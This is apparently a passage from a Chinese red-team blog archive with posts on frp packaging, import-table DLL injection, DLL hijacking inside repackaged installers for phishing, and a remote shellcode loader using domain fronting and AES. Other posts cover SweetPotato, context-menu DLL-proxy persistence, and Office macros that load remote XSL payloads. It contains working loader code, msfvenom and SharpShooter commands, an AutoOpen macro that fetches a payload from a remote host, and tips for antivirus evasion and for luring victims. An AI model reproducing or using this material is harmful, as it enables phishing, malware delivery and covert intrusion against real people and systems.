然后修改一下目录下带的package.sh

# compile for version
make
if [ $? -ne 0 ]; then
    echo "make error"
    exit 1
fi

frp_version=`./bin/frps --version`
echo "build version: $frp_version"

# cross_compiles
make -f ./Makefile.cross-compiles

rm -rf ./release/packages
mkdir -p ./release/packages

os_all='linux windows darwin freebsd'
arch_all='386 amd64 arm arm64 mips64 mips64le mips mipsle'

cd ./release

for os in $os_all; do
    for arch in $arch_all; do
        frp_dir_name="frp_${frp_version}_${os}_${arch}"
        frp_path="./packages/frp_${frp_version}_${os}_${arch}"
        cd ..
        rm -rf ${frp_path}
    done
done

cd -

然后运行这个bash脚本，就可以交叉编译得到各种操作系统环境下的应用程序了。

Github

没有环境或无法正常编译可直接到github下载

https://github.com/uknowsec/frpModify

结语

通读了一下frpc读取配置文件和认证过程两部分的代码，然后再了解了cobra库的用法，实现简单的去特征，frpc无参和传参版的改造。后面的目标会继续研究frpc减小体积部分的改造。

输入表注入

2020-06-12T19:17:17.000Z

前言

上篇没有讲拿破轮胎大佬工具的原理，同时工具生成的DLL目前不是免杀的。所以这里讲一下工具的原理。实际上，注入工具会将输入的shellcode进行一个处理，然后将他写入到和conf.inf文件中，然后wwwcomw.dll可以看成一个shellcode加载器，这里就是分离免杀的原理。工具还帮我完成了修改输入表的步骤。然后我们只需要把wwwcomw.dll和conf.inf放置到exe运行目录即可。

输入表注入原理

当Exe被加载时，系统会根据Exe输入表信息来加载需要用到的DLL,输入表注入的原理就是修改exe输入表，将自己的DLL添加到exe的导入表中，这样exe运行时可以将自己的DLL加载到exe的进程空间。

输入表注入

DLL实例源码：

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include 
#include 
HANDLE My_hThread = NULL;

DWORD  WINAPI  ceshi(LPVOID pParameter)

{
    MessageBox(NULL, L"Zero Team", L"Zero team", MB_OK);
    return 0;

}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        My_hThread = ::CreateThread(NULL, 0, &ceshi, 0, 0, 0);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}


extern"C" _declspec(dllexport) void test()
{
    int a;
    a = 0;
}

编译如上代码，得到dll文件。

使用LordPe查看输出表，可以看到我们写的test函数。

使用Stud_PE添加输入表，导入exe查看函数。

添加新的输入表，选择DLL，选择函数，加入清单。

将DLL放置到exe运行目录，运行exe。

结语

对于该技术的研究仅限于在渗透测试或者钓鱼中的使用，所以没有太多的逆向原理知识部分。关于其他逆向原理知识和DLL处理方面，有兴趣的可以自己研究~

DLL劫持+重新制作安装包在钓鱼与反钓鱼的利用

2020-06-11T14:17:17.000Z

前言

在红队工作中，社工钓鱼会是最常见的攻击手段，同样蓝队工作中，蓝队可以通过反制红队获取加分。所以本文就简单说DLL劫持+重制安装包在钓鱼与反钓鱼中的利用。

钓鱼中的利用

在钓鱼攻击中，我们可以使用这种DLL劫持+重制安装包的方法来进行钓鱼是非常有效的。我们可以通过一些软件更新等说辞去下发恶意的安装包，恶意的安装包的安装过程逼真，同时程序正常功能都可以完美的运行。更不会使目标怀疑。

反钓鱼中的利用

在蓝队可以利用此方法来反制红队，例如：我们可以在自己准备好的虚拟机中点击红队发送过来的钓鱼邮件。并在虚拟机中准备一些让红队比较感兴趣的东西。

例如下图中的已准备好的“VPN安装包“+“VPN账号密码”。

当红队队员将这些安装包和账号密码传回自己本地进行安装并运行时，我们就可以成功的反控红队队员的机器了。

DLL劫持+重制安装包具体操作

DLL劫持

这里可以用到拿破轮胎大佬写DLL注入工具

使用方法：

输入cs或者msf生成shellcode生成免杀dll文件
添加需要劫持的软件或者dll
劫持过后会在运行目录生成一个Dll和inf配置文件
需要把两个文件放在被劫持的软件同目录下才可运行

这里以某国产VPN为例：

注入后，将wwwcomw.dll和conf.inf放到软件同目录下。

当运行软件时就能上线了。

重新制作安装包

这里用到的工具是NSIS。

制作过程就不写了，有兴趣的可以去百度找找使用说明。

https://www.cnblogs.com/modou/p/3573772.html

成功打包

安装包制作效果

安装过程效果：

安装完成后，可自动运行，并创建桌面快捷方式。

运行后，成功上线

总结

本文只是简单说下DLL劫持+重制安装包在钓鱼和反钓鱼中的利用，文中的工具和DLL可能存在不免杀和实战中的更多细节内容可自行解决~

ShellCode远程加载器改造计划

2020-06-01T14:17:17.000Z

前言

shellcode加载器加载shellcode实现免杀上线，目前可能是使用最多的方法了。

现有的加载器也特别多，但是改造轮子的心总是在骚动，所以就开始了Shellcode远程加载器改造计划。

Winhttp实现HTTP请求

所谓远程加载shellcode，第一部得实现远程的功能，这里用Winhttp实现http请求来获取我们文件服务器上的shellcode。

string GetShellcodeByDefault(string strUrl)
{
    string strHost = GetHost(strUrl);//获取Host
    string strRequestStr = GetRequestStr(strUrl);//获取请求路径
    string header = "Content-type: application/x-www-form-urlencoded\r\nCache-Control: max-age=0\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.8\r\n";
    USES_CONVERSION;
    LPCWSTR host = A2CW(strHost.c_str());
    LPCWSTR requestStr = A2CW(strRequestStr.c_str());
    //Variables
    DWORD dwSize = 0;
    DWORD dwDownloaded = 0;
    LPSTR pszOutBuffer;
    vector <string>  vFileContent;
    BOOL  bResults = FALSE;

    HINTERNET  hSession = NULL,
        hConnect = NULL,
        hRequest = NULL;
    string strHtml = "";// store the html code
    hSession = WinHttpOpen(L"User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.2141.400 QQBrowser/9.5.10219.400",
        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
        WINHTTP_NO_PROXY_NAME,
        WINHTTP_NO_PROXY_BYPASS, 0);
    // Specify an HTTP server.
    if (hSession)
        hConnect = WinHttpConnect(hSession, host,
            INTERNET_DEFAULT_HTTP_PORT, 0);
    // Create an HTTP request handle.
    if (hConnect)
        hRequest = WinHttpOpenRequest(hConnect, L"GET", requestStr,
            NULL, WINHTTP_NO_REFERER,
            NULL,
            NULL);

    //Add HTTP header 
    LPCWSTR header1 = A2CW(header.c_str());
    SIZE_T len = lstrlenW(header1);
    WinHttpAddRequestHeaders(hRequest, header1, DWORD(len), WINHTTP_ADDREQ_FLAG_ADD);

    // Send a request.
    if (hRequest)
        bResults = WinHttpSendRequest(hRequest,
            WINHTTP_NO_ADDITIONAL_HEADERS,
            0, WINHTTP_NO_REQUEST_DATA, 0,
            0, 0);
    // End the request.
    if (bResults)
        bResults = WinHttpReceiveResponse(hRequest, NULL);

    //obtain the html source code
    if (bResults)
        do
        {
            // Check for available data.
            dwSize = 0;
            if (!WinHttpQueryDataAvailable(hRequest, &dwSize))
                printf("Error %u in WinHttpQueryDataAvailable.\n",
                    GetLastError());
            // Allocate space for the buffer.
            pszOutBuffer = new char[dwSize + 1];
            if (!pszOutBuffer)
            {
                printf("Out of memory\n");
                dwSize = 0;
            }
            else
            {
                // Read the Data.
                ZeroMemory(pszOutBuffer, dwSize + 1);
                if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer,
                    dwSize, &dwDownloaded))
                {
                    printf("Error %u in WinHttpReadData.\n",
                        GetLastError());
                }
                else
                {
                    //printf("%s", pszOutBuffer);
                   // Data in vFileContent
                    vFileContent.push_back(pszOutBuffer);

                }
                // Free the memory allocated to the buffer.
                delete[] pszOutBuffer;
            }
        } while (dwSize > 0);
        // Keep checking for data until there is nothing left.
       // Report any errors.
        if (!bResults)
            printf("Error %d has occurred.\n", GetLastError());
        // Close any open handles.
        if (hRequest) WinHttpCloseHandle(hRequest);
        if (hConnect) WinHttpCloseHandle(hConnect);
        if (hSession) WinHttpCloseHandle(hSession);

        for (int i = 0; i < (int)vFileContent.size(); i++)
        {
            str = vFileContent[i];
            strHtml += vFileContent[i];
        }
        return strHtml;
}

如上代码让已有的加载器实现一个远程加载shellcode的功能。

DomainFronting

但是远程加载shellcode容易暴露自己的文件服务器地址，所以这里用到了域前置，可以用来隐藏自己的服务器地址。

https://dcdn.console.aliyun.com/domain/list

申请你要加速的域名，例如test.com和源站信息。

申请完后就可以通过他给你分配cdn地址加上你host: test.com来访问的你地址了。

如下命令：

1	wget -U demo -q -O - http://test.com.w.cdngslb.com/ --header "Host: test.com"

通过域前置的方法可以有效的隐藏我们C2地址或加载器的文件服务器。同时此类CDN地址可能存在于白名单，可用于绕过流量监测。

这里在修改一个Winhttp实现HTTP请求方法，给它填上一个host头。

string GetShellcodeByDomainFronting(string strUrl)
{
    string strHost = GetHost(strUrl);//获取Host
    string strRequestStr = GetRequestStr(strUrl);//获取请求路径
    string header = "Host: " + strHost + "\r\nContent-type: application/x-www-form-urlencoded\r\nCache-Control: max-age=0\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.8\r\n";
    strHost = strHost + ".w.cdngslb.com";
    USES_CONVERSION;
    LPCWSTR host = A2CW(strHost.c_str());//string转换为常量指针类型
    LPCWSTR requestStr = A2CW(strRequestStr.c_str());
    //Variables
    DWORD dwSize = 0;
    DWORD dwDownloaded = 0;
    LPSTR pszOutBuffer;
    vector <string>  vFileContent;
    BOOL  bResults = FALSE;

    //Note the definition of HINTERNET
    HINTERNET  hSession = NULL,
        hConnect = NULL,
        hRequest = NULL;
    string strHtml = "";// store the html code
    string str;//temporary variables

// Use WinHttpOpen to obtain a session handle.
    hSession = WinHttpOpen(L"User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.2141.400 QQBrowser/9.5.10219.400",
        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
        WINHTTP_NO_PROXY_NAME,
        WINHTTP_NO_PROXY_BYPASS, 0);
    // Specify an HTTP server.
    if (hSession)
        hConnect = WinHttpConnect(hSession, host,
            INTERNET_DEFAULT_HTTP_PORT, 0);
    // Create an HTTP request handle.
    if (hConnect)
        hRequest = WinHttpOpenRequest(hConnect, L"GET", requestStr,
            NULL, WINHTTP_NO_REFERER,
            NULL,
            NULL);

    //Add HTTP header 
    LPCWSTR header1 = A2CW(header.c_str());
    SIZE_T len = lstrlenW(header1);
    WinHttpAddRequestHeaders(hRequest, header1, DWORD(len), WINHTTP_ADDREQ_FLAG_ADD);

    // Send a request.
    if (hRequest)
        bResults = WinHttpSendRequest(hRequest,
            WINHTTP_NO_ADDITIONAL_HEADERS,
            0, WINHTTP_NO_REQUEST_DATA, 0,
            0, 0);
    // End the request.
    if (bResults)
        bResults = WinHttpReceiveResponse(hRequest, NULL);

    //obtain the html source code
    if (bResults)
        do
        {
            // Check for available data.
            dwSize = 0;
            if (!WinHttpQueryDataAvailable(hRequest, &dwSize))
                printf("Error %u in WinHttpQueryDataAvailable.\n",
                    GetLastError());
            // Allocate space for the buffer.
            pszOutBuffer = new char[dwSize + 1];
            if (!pszOutBuffer)
            {
                printf("Out of memory\n");
                dwSize = 0;
            }
            else
            {
                // Read the Data.
                ZeroMemory(pszOutBuffer, dwSize + 1);
                if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer,
                    dwSize, &dwDownloaded))
                {
                    printf("Error %u in WinHttpReadData.\n",
                        GetLastError());
                }
                else
                {
                    //printf("%s", pszOutBuffer);
                   // Data in vFileContent
                    vFileContent.push_back(pszOutBuffer);

                }
                // Free the memory allocated to the buffer.
                delete[] pszOutBuffer;
            }
        } while (dwSize > 0);
        // Keep checking for data until there is nothing left.
       // Report any errors.
        if (!bResults)
            printf("Error %d has occurred.\n", GetLastError());
        // Close any open handles.
        if (hRequest) WinHttpCloseHandle(hRequest);
        if (hConnect) WinHttpCloseHandle(hConnect);
        if (hSession) WinHttpCloseHandle(hSession);

        for (int i = 0; i < (int)vFileContent.size(); i++)
        {
            str = vFileContent[i];
            strHtml += vFileContent[i];
        }
        return strHtml;
}

AES加密

用如上的域前置方法可以有效的隐藏我们的文件服务器，但是在通信过程中，我们shellcode还是会暴露。所以参照冰蝎的原理，我们可以实现一个对shellcode进行一个AES动态加密的过程。

客户端（C++ 加载器）

C++加载器随机生成一个key值，通过HTTP请求，将key发给文件服务器。

文件服务器收到请求用key值来加密已有的shellcode，回显给客户端。

C++加载器用cryptopp库，写一个AES解密函数来解密发过来的shellcode。

如下是AES解密函数：

string cryptopp::decrypt(const string& cipherTextHex)
{
    string cipherText;
    string decryptedText;

    unsigned int i = 0;
    while (true)
    {
        char c;
        int x;
        stringstream ss;
        ss << hex << cipherTextHex.substr(i, 2).c_str();
        ss >> x;
        c = (char)x;
        cipherText += c;
        if (i >= cipherTextHex.length() - 2)break;
        i += 2;
    }

    try {
        CryptoPP::AES::Decryption aesDecryption(s_key, CryptoPP::AES::DEFAULT_KEYLENGTH);
        CryptoPP::CBC_Mode_ExternalCipher::Decryption cbcDecryption(aesDecryption, s_iv);
        //CryptoPP::StreamTransformationFilter stfDecryptor(cbcDecryption, new CryptoPP::StringSink( decryptedText ),CryptoPP::StreamTransformationFilter::NO_PADDING);
        CryptoPP::StreamTransformationFilter stfDecryptor(cbcDecryption, new CryptoPP::StringSink(decryptedText));
        stfDecryptor.Put(reinterpret_cast<const unsigned char*>(cipherText.c_str()), cipherText.size());

        stfDecryptor.MessageEnd();
    }
    catch (const std::exception& e) {
        decryptedText = "";
    }

    return decryptedText;
}

服务端（Python Flask）

服务端用Flask写一个web服务，获取请求发送过来的key，用这个key对shellcode进行解密，然后回显给客户端。

AES加密实现方法：

def AES_Encrypt(key):
    BS = AES.block_size
    pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
    unpad = lambda s : s[0:-ord(s[-1])]

    key = key # the length can be (16, 24, 32)
    vi = '0000000000000000'
    shellcode = ''

    cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, vi.encode('utf8'))

    encrypted = cipher.encrypt(pad(shellcode)).encode('hex')
    return str(encrypted)

key随机生成，至此就可以实现一个简单AES动态流量加密的过程了。

SweetPotato webshell下执行命令版

2020-04-17T10:09:17.000Z

SweetPotato webshell下执行命令版

前言

前两天看到了github上有老外发了一个C#版的烂土豆，所以就想改一个能在webshell下执行命令的版本。

请教了@zcgonvh和@RcoIl两位师傅，学习了用管道对进程于进程之间进行通信。感谢两位师傅的耐心指导~

管道

引用申明

public struct SECURITY_ATTRIBUTES
{
     public Int32 nLength;
     public IntPtr lpSecurityDescriptor;
     public int bInheritHandle;
}
[DllImport("kernel32.dll", SetLastError = true)]
        public static extern bool CreatePipe(ref IntPtr hReadPipe, ref IntPtr hWritePipe, ref SECURITY_ATTRIBUTES lpPipeAttributes, Int32 nSize);

[DllImport("kernel32.dll", SetLastError = true)]
        public static extern bool ReadFile(IntPtr hFile, byte[] lpBuffer, int nNumberOfBytesToRead, ref int lpNumberOfBytesRead, IntPtr lpOverlapped/*IntPtr.Zero*/);
        
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
internal static extern Boolean CloseHandle(IntPtr hObject);

创建管道

SECURITY_ATTRIBUTES saAttr = new SECURITY_ATTRIBUTES();
saAttr.nLength = Marshal.SizeOf(typeof(SECURITY_ATTRIBUTES));
saAttr.bInheritHandle = 0x1;
saAttr.lpSecurityDescriptor = IntPtr.Zero;

if(CreatePipe(ref out_read, ref out_write, ref saAttr, 0))
{
    Console.WriteLine("[+] CreatePipe success");
}

新创建进程的标准输出连在写管道一端

STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
si.cb = Marshal.SizeOf(si);
si.lpDesktop = @"WinSta0\Default";
si.hStdOutput = out_write;
si.hStdError = err_write;
si.dwFlags |= STARTF_USESTDHANDLES;
CreateProcessWithTokenW(potatoAPI.Token, 0, program, finalArgs, CREATE_NO_WINDOW, IntPtr.Zero, null, ref si, out pi);

读取管道

CloseHandle(out_write);
byte[] buf = new byte[BUFSIZE];
int dwRead = 0;
while (ReadFile(out_read, buf, BUFSIZE, ref dwRead, IntPtr.Zero))
     {
          byte[] outBytes = new byte[dwRead];
          Array.Copy(buf, outBytes, dwRead);                    
  Console.WriteLine(System.Text.Encoding.Default.GetString(outBytes));
}
CloseHandle(out_read);

截图

github

https://github.com/uknowsec/SweetPotato

DLL劫持右键菜单实现持久化

2020-04-13T10:09:17.000Z

DLL代理

如下图，DLL代理是通过创建一个恶意的DLL来替换原有程序的DLL，同时不删除原有程序的DLL，将其重命名。恶意的DLL在被调用的时候会运行恶意的代码功能，并把原有的DLL功能部分转发给原始DLL，这样更好的确保原有程序的功能正常运行且不被迫坏。

右键菜单注册表

注册表路径：HKLM\Software\Classes*\ShellEx\ContextMenuHandlers

利用autoruns可以查看此注册表路径中加载的DLL文件。

同样也可以对其他自启动注册表里的dll文件进行劫持。

我们可以用C#实现一个小程序来读取可劫持的DLL。代码如下：

using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

namespace dll
{
    class Program
    {
        static void Main(string[] args)
        {
            GetKey(@"Software\Classes\*\ShellEx\ContextMenuHandlers\");
        }

        private static void GetKey(string path)
        {

            using (RegistryKey key = Registry.LocalMachine.OpenSubKey(path))
            {
                if (key != null)
                {

                    string[] rk = key.GetSubKeyNames();
                    foreach (var item in rk)
                    {

                        string value = GetRegistryValue(path + item);
                        string imgpath = GetrootValue(@"CLSID\" + value + @"\InprocServer32\");
                        if (imgpath != null && imgpath != "")
                        {
                            Console.WriteLine(imgpath);
                        }
                    }

                }

            }
        }
        protected static string GetRegistryValue(string path)
        {
            string value = string.Empty;
            RegistryKey root = Registry.LocalMachine;
            RegistryKey rk = root.OpenSubKey(path);
            if (rk != null)
            {
                value = (string)rk.GetValue("", null);
            }
            return value;
        }
        protected static string GetrootValue(string path)
        {
            string value = string.Empty;
            RegistryKey root = Registry.ClassesRoot;
            RegistryKey rk = root.OpenSubKey(path);
            if (rk != null)
            {
                value = (string)rk.GetValue("", null);
            }
            return value;
        }
    }
}

创建一个代理的DLL

这里用到一个开源的项目。

https://github.com/rek7/dll-hijacking

生成的definitions.h

#pragma once

/*
7-zip.dll - 8664 machine (x64)
*/

#pragma comment(linker,"/export:DllCanUnloadNow=7-zip_.DllCanUnloadNow,@1")
#pragma comment(linker,"/export:DllGetClassObject=7-zip_.DllGetClassObject,@2")
#pragma comment(linker,"/export:DllRegisterServer=7-zip_.DllRegisterServer,@3")
#pragma comment(linker,"/export:DllUnregisterServer=7-zip_.DllUnregisterServer,@4")

替换definitions.h头文件，作者项目的代码里是用的powershell来反弹shell。代码好像有点问题，我这里修改代码进行简单的弹框测试。

/*

https://itm4n.github.io/dll-proxying/
https://www.codeproject.com/Articles/17863/Using-Pragmas-to-Create-a-Proxy-DLL

to implement: hooking specific functions

*/

#include "definitions.h"
#include 
#include 
#include 
extern "C" {
    #include 
    #include 
    #include 
    #include 
    #include 
}
using namespace std;
#pragma comment(lib,"Ws2_32.lib")

BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,  // handle to DLL module
    DWORD fdwReason,     // reason for calling function
    LPVOID lpReserved)  // reserved
{
    srand(time(NULL));
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
        {
MessageBox(NULL, "Zero Team", "Zero team", MB_OK);
            break;
        }
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
        case DLL_PROCESS_DETACH:
            break;
        default:
            break;
    }
    return true;  // Successful DLL_PROCESS_ATTACH.
}

劫持程序右键菜单

编译生成恶意的DLL命名为7-zip.dll，并将原有DLL改名为7-zip_.dll。当我们右键单击程序时，即可运行恶意的DLL。

拓展

作者项目里的反弹shell，测试不能成功。我们可以自己用C语言写一个反弹shell的功能，或者加载shellcode。

如下为在装有卡巴斯基的机器上测试劫持notepad++。成功劫持，并反弹shell，且卡巴斯基未告警。

反弹shell demo流量未加密，最好不要在实战中使用，dll内容可以自己发挥。

Reference

https://b.ou.is/articles/2020-03/context-menu-persistance

加载远程XSL文件的宏免杀方法

2020-03-21T10:09:17.000Z

前言

“打点越来越难了，社工钓鱼会是最常见的攻击手段，0day会是最有效的攻击手段，物理渗透会是危害最大的攻击手段“。

在钓鱼攻击中木马的形式主要如下：

Office
DLL劫持
假冒加固工具
木马捆绑

通常办公软件Office具有最大的安装量，将文档插入邮件中已经是惯用的工作方式。但是Office常见的攻击方法：

0day
已知CVE漏洞
DDEAUTO
注入执行命令
宏
第一种方法直接跳过，已知的CVE漏洞特征太明显，免杀成本和技术含量太大了。DDEAUTO和注入执行命令直接被杀软限制的很死。最后只能靠宏了，虽然默认情况下，Office已经禁用所有宏，但仍会在打开Word文档的时候发出通知。
通过收集宏免杀的常用的方法和测试，发现加载远程.xsl文件可以绕过国内常用的杀软360全家桶和火绒成功上线。

SharpShooter

通过收集和测试一些开源的宏免杀的项目，发现了一个很好的项目，国外一个安全团队写的钓鱼框架。其中一个工具就是可以生成一个VBA宏文件，这个宏文件会用XMLDOM去加载远程的.xsl文件。

具体原理和利用分析见文章：

Macros and More with SharpShooter v2.0

利用测试

生成payload.bin

首先我们可以用Cobalt Strike或者Metasploit生成二进制格式的shellcode，即后缀为bin的文件。

处理payload.bin

然后利用msfvenom对payload.bin，因为SharpShooter要求shellcode中不能含有空字节。

1	msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x86 --platform windows -e x86/shikata_ga_nai -f raw -o shellcode-encoded.bin -b "\x00"

生成xsl和macro

如下命令生成.xsl文件和macro文件：

1	SharpShooter.py --stageless --dotnetver 2 --payload macro --output foo --rawscfile shellcode-encoded.bin --com xslremote --awlurl http://192.168.0.104:80/foo.xsl

简单介绍一下上面的几个参数：

–dotnetver：为目标的.net版本，可选2或者4
–awlurl：为xsl存放地址

生成的foo.macro内容很简单，代码如下：

Sub Auto_Open()
    Set XML = CreateObject("Microsoft.XMLDOM")
    XML.async = False
    Set xsl = XML
    xsl.Load "http://192.168.0.104:80/foo.xsl"
    XML.transformNode xsl
End Sub

创建一个对象加载远程的xsl文件。如果需要使函数Auto_Open()加到AutoOpen()方法里，这样就可以在打开word文档的时间就能运行宏，具体代码如下：

Sub AutoOpen()
  Auto_Open
End Sub
Sub Auto_Open()
    Set XML = CreateObject("Microsoft.XMLDOM")
    XML.async = False
    Set xsl = XML
    xsl.Load "http://192.168.0.104:80/foo.xsl"
    XML.transformNode xsl
End Sub

foo.xsl文件为SharpShooter处理后的shellcode。

我们可以把foo.xsl传到自己的vps或者公共下载网站，然后修改vba代码中的地址即可。再讲vba代码加到word或着excel文档中即可。

进程迁移

office宏加载远程的.xsl文件有个缺点就是，点击启用宏后word进程会崩掉，如word进程被结束了，Cobalt Strike或者Metasploit会掉线。所以我们要做的是，在目标上线的时候就自动迁移到其他进程上。

处理方法：

Cobalt Strike：通过插件实现上线后自动迁移进程，Beacon Handler Suite
Metasploit: 在设置监听的时间可以设置：set autorunscript migrate -N explorer.exe 或 set autorunscript -f

这样可以实现在word进程被关闭后，得到一个新的会话，即持久的控制目标。

演示视频

引导性处理

为了更好去引导目标启用宏可以如下处理：

第一步：进入开发工具，选择插入控件—其他控件—Microsoft RDP Client Control*

第二步：设置控件属性内的Sever为localhost StartConnection为1，即点开自启动

第三步：插入vba代码

设置完成后，启用宏的提示就变成了部分活动内容已被禁用，启用内容。

这样就更好的去引导目标启用宏了。

总结

“站在巨人的肩膀上”，以上的思路和方法是最近一个星期在github、twitter和国内外的安全网站论坛上收集和测试得到的结果。然后自己做的一个总结，有兴趣的师傅可以自己研究SharpShooter这个项目，并关注我们的微信公众号，后续我们会继续分享一些思路和方法。

Reference

https://www.secquan.org/Discuss/1070836

https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/

https://github.com/mdsecactivebreach/SharpShooter

frida-hook工具篇

2020-02-06T10:09:17.000Z

Brida

Brida简介

Brida是BurpSuite的一个插件，它可以将Burp和Frida结合起来使用，可以在 BurpSuite中直接调用目标应用程序中的加/解密函数，这样就可以根据你的需求修改移动端APP与服务器的通信流量。而不用去逆向它，从而节省测试人员的精力。

https://github.com/federicodotta/Brida

Brida安装

Brida目前只支持python 2.7。

1
2
3

pip install frida
pip install frida-tools
pip install pyro4

Brida可以直接从BurpSuite中安装

Brida功能模块

Brida控制台

填好配置项后先点击Start Server然后在点击Spawn application。

Brida由以下三部分组成：

Brida.jar为Burpsuite插件；
bridaServicePyro是用于Frida适配到burpsuite上的python脚本，这一部分存储在插件中，在执行brida过程中复制到缓存文件夹中；
script.js是要注入到目标应用程序的javascript脚本，它会通过Frida带有的rpc.exports功能将信息返回到拓展程序中，同时该script.js脚本会被Frida注入到我们在 Brida中指定的进程中所以我们可以直接使用 Frida的API。

Brida的几个配置参数：

配置参数	说明
Python binary path	即Python可执行程序路径，用于启动Pyro服务
Pyro host, Pyro port	即Pyro 服务的主机以及端口，可以保持默认
Frida JS file path	需要注入的Frida脚本存放的位置
Application ID	目标进程名(APP的包名)
Frida Remote”/“Frida Loca	如果您使用的是Frida USB操作模式，则必须选择“ Frida Local”。如果使用端口转发模式，则必须选择“ Frida Remote”。

JS编辑器

可以实时对hook脚本进行编辑。

Analyze Binary

切换到Analyze Binary，点击Load tree，然后可能会卡一会，因为在加载类列表，加载完点开Java，可以看到这个进程里的所有类，可在下面的搜索框直接搜crypt来找加解密类。

其功能和TraceView 相似，我们在操作APP的时候，他会打印出所有加载的类和方法。

点开java下拉找到app包名通过一个一个插桩然后进行提交测试看响应框是否会有信息。

通过插桩可以看到此方法前后的输入值与返回值，同时可以通过change return value修改方法返回值。

Execute method

在通用js脚本中的rpc.exports里帮写了四个contextcustom，这四个是给右键菜单预留的，contextcustom1、contextcustom2会出现在repeater等模块中request的右键菜单，contextcustom2、contextcustom3则会出现在response的右键菜单。主要就是为了实现手动加解密的功能。这四个函数接收的参数都是hex形式的，所以返回的时候也要转成hex再传出去。

例如：我们掉模块中调用函数contextcustom1返回值为上面代码中的6566。

Generate stubs

这里可以生成java/python代码，METHOD_NAME你要调用hook脚本的函数，即如上的contextcustom1，另外一处标红为参数列表。

我们要实现的功能只是要让Repeater, Intruder and Scanner模块能对数据进行自动加/解密。

如下代码是brida官方文档给出的通用代码，我们只需修改调用的函数名和参数并对相关的加密解密数据进行处理即可。

package burp;

import java.io.PrintWriter;
import java.util.Arrays;
import org.apache.commons.lang3.ArrayUtils;
import net.razorvine.pyro.PyroProxy;
import net.razorvine.pyro.PyroURI;

public class BurpExtender implements IBurpExtender, IHttpListener {
  private PrintWriter stdout;
  private PrintWriter stderr;    
  private IBurpExtenderCallbacks callbacks;
  private IExtensionHelpers helpers;
    
  public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
    // Set the name of the extension
    callbacks.setExtensionName("Brida Demo Search Plugin");
    // Initialize stdout and stderr (configurable from the Extension pane)
    stdout = new PrintWriter(callbacks.getStdout(), true);
    stderr = new PrintWriter(callbacks.getStderr(), true);  
    // Save references to useful objects
    this.callbacks = callbacks;
    this.helpers = callbacks.getHelpers();
    // Register ourselves as an HttpListener, in this way all requests and responses will be forwarded to us
    callbacks.registerHttpListener(this);
  }

  public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo) {
    
    // Process only Repeater, Scanner and Intruder requests
    if(toolFlag == IBurpExtenderCallbacks.TOOL_SCANNER || 
       toolFlag == IBurpExtenderCallbacks.TOOL_REPEATER ||
       toolFlag == IBurpExtenderCallbacks.TOOL_INTRUDER) {
      
      // Modify "test" parameter of Repeater requests
      if(messageIsRequest) {
        // Get request bytes
        byte[] request = messageInfo.getRequest();
        // Get a IRequestInfo object, useful to work with the request
        IRequestInfo requestInfo = helpers.analyzeRequest(request);
        // Get "test" parameter
        IParameter contentParameter = helpers.getRequestParameter(request, "content");
        if(contentParameter != null) {
          String urlDecodedContentParameterValue = helpers.urlDecode(contentParameter.getValue());
          String ret = "";
          // Ask Brida to encrypt our attack vector
          String pyroUrl = "PYRO:BridaServicePyro@localhost:9999";
          try {
            PyroProxy pp = new PyroProxy(new PyroURI(pyroUrl));
            ret = (String)pp.call("callexportfunction","encryptrequest",new String[]{urlDecodedContentParameterValue});
            pp.close();
          } catch(Exception e) {
            stderr.println(e.toString());
            StackTraceElement[] exceptionElements = e.getStackTrace();
            for(int i=0; i< exceptionElements.length; i++) {
              stderr.println(exceptionElements[i].toString());
            }
          }
          // Create the new parameter
          IParameter newTestParameter = helpers.buildParameter(contentParameter.getName(), helpers.urlEncode(ret), contentParameter.getType());
          // Create the new request with the updated parameter
          byte[] newRequest = helpers.updateParameter(request, newTestParameter);
          // Update the messageInfo object with the modified request (otherwise the request remains the old one)
          messageInfo.setRequest(newRequest);
        }
      
      // Response
      } else {
        // Get request bytes in order to check if the request contain "content" parameter
        byte[] request = messageInfo.getRequest();
        IRequestInfo requestInfo = helpers.analyzeRequest(request);
        IParameter contentParameter = helpers.getRequestParameter(request, "content");
        if(contentParameter != null) {
          // Get response bytes
          byte[] response = messageInfo.getResponse();
          // Get a IResponseInfo object, useful to work with the request
          IResponseInfo responseInfo = helpers.analyzeResponse(response);
          // Get the offset of the body
          int bodyOffset = responseInfo.getBodyOffset();
          // Get the body (byte array and String)
          byte[] body = Arrays.copyOfRange(response, bodyOffset, response.length);
          String bodyString = helpers.bytesToString(body);
          String ret = "";
          // Ask Brida to decrypt the response
          String pyroUrl = "PYRO:BridaServicePyro@localhost:9999";
          try {
            PyroProxy pp = new PyroProxy(new PyroURI(pyroUrl));
            ret = (String)pp.call("callexportfunction","decryptresponse",new String[]{bodyString});
            pp.close();
